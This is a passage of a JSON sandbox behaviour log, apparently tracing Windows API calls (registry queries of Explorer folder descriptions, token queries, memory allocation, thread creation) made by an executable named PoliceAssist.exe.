"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Roamable" } ], "repeated": 0, "id": 593 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a4" }, { "name": "ValueName", "value": "PreCreate" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\PreCreate" } ], "repeated": 0, "id": 594 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a4" }, { "name": "ValueName", "value": "Stream" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Stream" } ], "repeated": 0, "id": 595 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a4" }, { "name": "ValueName", "value": "PublishExpandedPath" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\PublishExpandedPath" } ], "repeated": 0, "id": 596 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a4" }, { "name": "ValueName", "value": "DefinitionFlags" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\DefinitionFlags" } ], "repeated": 0, "id": 597 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a4" }, { "name": "ValueName", "value": "Attributes" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Attributes" } ], "repeated": 0, "id": 598 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a4" }, { "name": "ValueName", "value": "FolderTypeID" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\FolderTypeID" } ], "repeated": 0, "id": 599 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a4" }, { "name": "ValueName", "value": "InitFolderHandler" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\InitFolderHandler" } ], "repeated": 0, "id": 600 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x000002a4" }, { "name": "SubKey", "value": "PropertyBag" }, { "name": "Handle", "value": "0x00000298" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\PropertyBag" } ], "repeated": 0, "id": 601 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002a4" } ], "repeated": 0, "id": 602 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000290" } ], "repeated": 0, "id": 603 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x00000290" } ], "repeated": 0, "id": 604 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 605 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "25" }, { "name": "TokenInformation", "value": "p\\xc0\\x7f\\x00\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 606 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions" }, { "name": "Handle", "value": "0x000002a4" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions" } ], "repeated": 0, "id": 607 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x000002a4" }, { "name": "SubKey", "value": "{F38BF404-1D43-42F2-9305-67DE0B28FC23}" }, { "name": "Handle", "value": "0x000002a8" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}" } ], "repeated": 0, "id": 608 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002a4" } ], "repeated": 0, "id": 609 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002a8" }, { "name": "ValueName", "value": "Category" }, { "name": "Data", "value": "2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Category" } ], "repeated": 0, "id": 610 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002a8" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "Windows" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Name" } ], "repeated": 0, "id": 611 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a8" }, { "name": "ValueName", "value": "ParentFolder" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParentFolder" } ], "repeated": 0, "id": 612 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a8" }, { "name": "ValueName", "value": "Description" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Description" } ], "repeated": 0, "id": 613 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a8" }, { "name": "ValueName", "value": "RelativePath" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\RelativePath" } ], "repeated": 0, "id": 614 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a8" }, { "name": "ValueName", "value": "ParsingName" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParsingName" } ], "repeated": 0, "id": 615 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a8" }, { "name": "ValueName", "value": "InfoTip" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InfoTip" } ], "repeated": 0, "id": 616 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a8" }, { "name": "ValueName", "value": "LocalizedName" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalizedName" } ], "repeated": 0, "id": 617 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a8" }, { "name": "ValueName", "value": "Icon" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Icon" } ], "repeated": 0, "id": 618 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a8" }, { "name": "ValueName", "value": "Security" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Security" } ], "repeated": 0, "id": 619 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a8" }, { "name": "ValueName", "value": "StreamResource" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResource" } ], "repeated": 0, "id": 620 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a8" }, { "name": "ValueName", "value": "StreamResourceType" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResourceType" } ], "repeated": 0, "id": 621 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a8" }, { "name": "ValueName", "value": "LocalRedirectOnly" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalRedirectOnly" } ], "repeated": 0, "id": 622 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a8" }, { "name": "ValueName", "value": "Roamable" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Roamable" } ], "repeated": 0, "id": 623 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a8" }, { "name": "ValueName", "value": "PreCreate" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PreCreate" } ], "repeated": 0, "id": 624 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a8" }, { "name": "ValueName", "value": "Stream" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Stream" } ], "repeated": 0, "id": 625 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a8" }, { "name": "ValueName", "value": "PublishExpandedPath" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PublishExpandedPath" } ], "repeated": 0, "id": 626 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a8" }, { "name": "ValueName", "value": "DefinitionFlags" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\DefinitionFlags" } ], "repeated": 0, "id": 627 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a8" }, { "name": "ValueName", "value": "Attributes" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Attributes" } ], "repeated": 0, "id": 628 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a8" }, { "name": "ValueName", "value": "FolderTypeID" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\FolderTypeID" } ], "repeated": 0, "id": 629 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a8" }, { "name": "ValueName", "value": "InitFolderHandler" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InitFolderHandler" } ], "repeated": 0, "id": 630 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x000002a8" }, { "name": "SubKey", "value": "PropertyBag" }, { "name": "Handle", "value": "0x000002a4" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PropertyBag" } ], "repeated": 0, "id": 631 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002a8" } ], "repeated": 0, "id": 632 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000290" } ], "repeated": 0, "id": 633 }, { "timestamp": "2025-11-20 10:58:28,406", "thread_id": "2188", "caller": "0x140005870", "parentcaller": "0x1400053d3", "category": "misc", "api": "SystemParametersInfoW", "status": true, "return": "0x00000001", "arguments": [ { "name": "Action", "value": "0x00002000" }, { "name": "uiParam", "value": "0x00000000" } ], "repeated": 0, "id": 634 }, { "timestamp": "2025-11-20 10:58:28,406", "thread_id": "2188", "caller": "0x140005893", "parentcaller": "0x1400053d3", "category": "misc", "api": "SystemParametersInfoW", "status": false, "return": "0x00000000", "arguments": [ { "name": "Action", "value": "0x00002001" }, { "name": "uiParam", "value": "0x00000000" } ], "repeated": 0, "id": 635 }, { "timestamp": "2025-11-20 10:58:28,406", "thread_id": "2188", "caller": "0x1400ca9ff", "parentcaller": "0x1400cbd5f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x054cb000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 636 }, { "timestamp": "2025-11-20 10:58:28,406", "thread_id": "2188", "caller": "0x1400ca9ff", "parentcaller": "0x1400cbd5f", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000029c" }, { "name": "DesiredAccess", "value": "0x00000009", "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Session Manager" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager" } ], "repeated": 0, "id": 637 }, { "timestamp": "2025-11-20 10:58:28,406", "thread_id": "2188", "caller": "0x1400ca9ff", "parentcaller": "0x1400cbd5f", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x0000029c" }, { "name": "ValueName", "value": "ResourcePolicies" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies" } ], "repeated": 0, "id": 638 }, { "timestamp": "2025-11-20 10:58:28,406", "thread_id": "2188", "caller": "0x1400ca9ff", "parentcaller": "0x1400cbd5f", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000029c" } ], "repeated": 0, "id": 639 }, { "timestamp": "2025-11-20 10:58:28,406", "thread_id": "2188", "caller": "0x1400ca9ff", "parentcaller": "0x1400cbd5f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02d30000" }, { "name": "RegionSize", "value": "0x0001a000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 640 }, { "timestamp": "2025-11-20 10:58:28,406", "thread_id": "2188", "caller": "0x1400ca9ff", "parentcaller": "0x1400cbd5f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02d30000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 641 }, { "timestamp": "2025-11-20 10:58:28,406", "thread_id": "2188", "caller": "0x1400ca9ff", "parentcaller": "0x1400cbd5f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x054cd000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 642 }, { "timestamp": "2025-11-20 10:58:28,406", "thread_id": "2188", "caller": "0x1400ca9ff", "parentcaller": "0x1400cbd5f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05373000" }, { "name": "RegionSize", "value": "0x00004000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 643 }, { "timestamp": "2025-11-20 10:58:28,406", "thread_id": "2188", "caller": "0x1400ca9ff", "parentcaller": "0x1400cbd5f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05377000" }, { "name": "RegionSize", "value": "0x00021000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 644 }, { "timestamp": "2025-11-20 10:58:28,406", "thread_id": "2188", "caller": "0x1400ca9ff", "parentcaller": "0x1400cbd5f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05398000" }, { "name": "RegionSize", "value": "0x00041000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 645 }, { "timestamp": "2025-11-20 10:58:28,406", "thread_id": "2188", "caller": "0x14000b81e", "parentcaller": "0x14000d2a6", "category": "threading", "api": "NtCreateThreadEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0x0000029c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "StartAddress", "value": "0x14000bd10" }, { "name": "Parameter", "value": "0x00000000" }, { "name": "CreateFlags", "value": "0x00000001" }, { "name": "ThreadId", "value": "3824" }, { "name": "ProcessId", "value": "3308" }, { "name": "Module", "value": "PoliceAssist.exe" } ], "repeated": 0, "id": 646 }, { "timestamp": "2025-11-20 10:58:28,406", "thread_id": "2188", "caller": "0x14000b81e", "parentcaller": "0x14000d2a6", "category": "threading", "api": "CreateRemoteThreadEx", "status": true, "return": "0x0000029c", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "StartRoutine", "value": "0x14000bd10" }, { "name": "Parameter", "value": "0x00000000" }, { "name": "CreationFlags", "value": "0x00000000" }, { "name": "ThreadId", "value": "3824" }, { "name": "ProcessId", "value": "3308" } ], "repeated": 0, "id": 647 }, { "timestamp": "2025-11-20 10:58:28,422", "thread_id": "2188", "caller": "0x14000b85a", "parentcaller": "0x14000d2a6", "category": "windows", "api": "PostThreadMessageW", "status": false, "return": "0x00000000", "arguments": [ { "name": "ProcessId", "value": "3308" }, { "name": "ThreadId", "value": "3824" }, { "name": "Message", "value": "1047" } ], "repeated": 0, "id": 648 }, { "timestamp": "2025-11-20 10:58:28,422", "thread_id": "2188", "caller": "0x14000b867", "parentcaller": "0x14000d2a6", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "10" } ], "repeated": 0, "id": 649 }, { "timestamp": "2025-11-20 10:58:28,422", "thread_id": "3824", "caller": "0x7ffee34e507d", "parentcaller": "0x7ffee34e4c43", "category": "threading", "api": "NtTestAlert", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 650 }, { "timestamp": "2025-11-20 10:58:28,437", "thread_id": "2188", "caller": "0x14000b85a", "parentcaller": "0x14000d2a6", "category": "windows", "api": "PostThreadMessageW", "status": true, 